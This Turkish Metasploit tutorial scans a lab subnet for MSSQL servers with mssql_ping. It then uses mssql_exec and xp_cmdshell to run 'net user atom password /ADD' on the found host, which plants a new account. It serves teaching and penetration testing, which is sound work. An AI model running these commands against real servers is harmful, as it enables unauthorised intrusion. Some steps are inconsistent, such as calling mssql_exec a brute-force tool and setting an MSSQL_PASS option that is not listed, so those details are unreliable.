MSF İçinde MSSQL Tarama

Estimated read time 5 min read

Metasploit Framework’ün kullanıcıya sağladığı imkanlardan bir tanesi de dahil bulunduğunuz ağdaki diğer Ip adreslerinde MSSQL kurulumunun olup olmadığını araştırabilmenizdir. Bunun için UDP tarama ile iz araması yapılır.

MSSQL ilk kurulduğunda varsayılan olara 1433 numaralı porttan dinleme yapar. Dinlemenin, 1433 portundan değil de rastgele seçilen portlardan yapılması ayarlanmış olabilir. Bu durumda da 1434 numaralı porta, dinlemenin hangi porttan yapıldığı sorulabilir.

Aşağıdaki örnekte, öncelikle içinde mssql ifadesi geçen modüller aranmaktadır.

msf > search mssql

Matching Modules
================

  Name                           Disclosure Date Rank    Description
  ----                           --------------- ----    -----------
  auxiliary/admin/mssql/mssql_enum                      normal   Microsoft SQL Server Configuration Enumerator
  auxiliary/admin/mssql/mssql_enum_domain_accounts              normal   Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
  auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli           normal   Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
  auxiliary/admin/mssql/mssql_enum_sql_logins                normal   Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
  auxiliary/admin/mssql/mssql_escalate_dbowner                normal   Microsoft SQL Server Escalate Db_Owner
  auxiliary/admin/mssql/mssql_escalate_dbowner_sqli             normal   Microsoft SQL Server SQLi Escalate Db_Owner
  auxiliary/admin/mssql/mssql_escalate_execute_as              normal   Microsoft SQL Server Escalate EXECUTE AS
  auxiliary/admin/mssql/mssql_escalate_execute_as_sqli            normal   Microsoft SQL Server SQLi Escalate Execute AS
  auxiliary/admin/mssql/mssql_exec                      normal   Microsoft SQL Server xp_cmdshell Command Execution
  auxiliary/admin/mssql/mssql_findandsampledata               normal   Microsoft SQL Server Find and Sample Data
  auxiliary/admin/mssql/mssql_idf                      normal   Microsoft SQL Server Interesting Data Finder
  auxiliary/admin/mssql/mssql_ntlm_stealer                  normal   Microsoft SQL Server NTLM Stealer
  auxiliary/admin/mssql/mssql_ntlm_stealer_sqli               normal   Microsoft SQL Server SQLi NTLM Stealer
  auxiliary/admin/mssql/mssql_sql                      normal   Microsoft SQL Server Generic Query
  auxiliary/admin/mssql/mssql_sql_file                    normal   Microsoft SQL Server Generic Query from File
  auxiliary/analyze/jtr_mssql_fast                      normal   John the Ripper MS SQL Password Cracker (Fast Mode)
  auxiliary/gather/lansweeper_collector                   normal   Lansweeper Credential Collector
  auxiliary/scanner/mssql/mssql_hashdump                   normal   MSSQL Password Hashdump
  auxiliary/scanner/mssql/mssql_login                    normal   MSSQL Login Utility
  auxiliary/scanner/mssql/mssql_ping                     normal   MSSQL Ping Utility
  auxiliary/scanner/mssql/mssql_schemadump                  normal   MSSQL Schema Dump
  auxiliary/server/capture/mssql                       normal   Authentication Capture: MSSQL
  exploit/windows/iis/msadc                 1998-07-17    excellent MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
  exploit/windows/mssql/lyris_listmanager_weak_pass     2005-12-08    excellent Lyris ListManager MSDE Weak sa Password
  exploit/windows/mssql/ms02_039_slammer          2002-07-24    good    MS02-039 Microsoft SQL Server Resolution Overflow
  exploit/windows/mssql/ms02_056_hello           2002-08-05    good    MS02-056 Microsoft SQL Server Hello Overflow
  exploit/windows/mssql/ms09_004_sp_replwritetovarbin    2008-12-09    good    MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
  exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09    excellent MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
  exploit/windows/mssql/mssql_clr_payload          1999-01-01    excellent Microsoft SQL Server Clr Stored Procedure Payload Execution
  exploit/windows/mssql/mssql_linkcrawler          2000-01-01    great   Microsoft SQL Server Database Link Crawling Command Execution
  exploit/windows/mssql/mssql_payload            2000-05-30    excellent Microsoft SQL Server Payload Execution
  exploit/windows/mssql/mssql_payload_sqli         2000-05-30    excellent Microsoft SQL Server Payload Execution via SQL Injection
  post/windows/gather/credentials/mssql_local_hashdump            normal   Windows Gather Local SQL Server Hash Dump
  post/windows/manage/mssql_local_auth_bypass                normal   Windows Manage Local Microsoft SQL Server Authorization Bypass

Listelenen modüllerden auxiliary/scanner/mssql/mssql_ping isimli modülü kullanacağız. Aşağıdaki örnekte 10.211.55.1/24 IP adres aralığına MSSQL taraması yapılmaktadır.

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

  Name         Current Setting Required Description
  ----         --------------- -------- -----------
  PASSWORD               no    The password for the specified username
  RHOSTS                yes    The target address range or CIDR identifier
  TDSENCRYPTION    false      yes    Use TLS/SSL for TDS data "Force Encryption"
  THREADS       1        yes    The number of concurrent threads
  USERNAME       sa        no    The username to authenticate as
  USE_WINDOWS_AUTHENT false      yes    Use windows authentification (requires DOMAIN option set)

msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

Sonuçta görüldüğü gibi 10.211.55.128 IP adresinde ve 1433 numaralı Portta MSSQL servisi çalışmaktadır. Bu noktadan sonra mssql_exec modülü kullanılarak brute-force denemeleri yapılabilir. Alternatif olarak medusa veya THC-Hydra kullanılabilir.

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

  Name         Current Setting            Required Description
  ----         ---------------            -------- -----------
  CMD         cmd.exe /c echo OWNED > C:\owned.exe no    Command to execute
  PASSWORD                          no    The password for the specified username
  RHOST                           yes    The target address
  RPORT        1433                 yes    The target port (TCP)
  TDSENCRYPTION    false                 yes    Use TLS/SSL for TDS data "Force Encryption"
  USERNAME       sa                  no    The username to authenticate as
  USE_WINDOWS_AUTHENT false                 yes    Use windows authentification (requires DOMAIN option set)


msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user atom password /ADD
cmd => net user atom password /ADD
msf auxiliary(mssql_exec) > exploit

Yukarıdaki örnekte, exploit başarılı olduğu takdirde, net user atom password /ADD komutunun gönderilerek MSSQL veri tabanına bir kullanıcı eklenmektedir. Bu komutun, set CMD net user atom password /ADD ile CMD değişkenine girildiğine dikkat edin.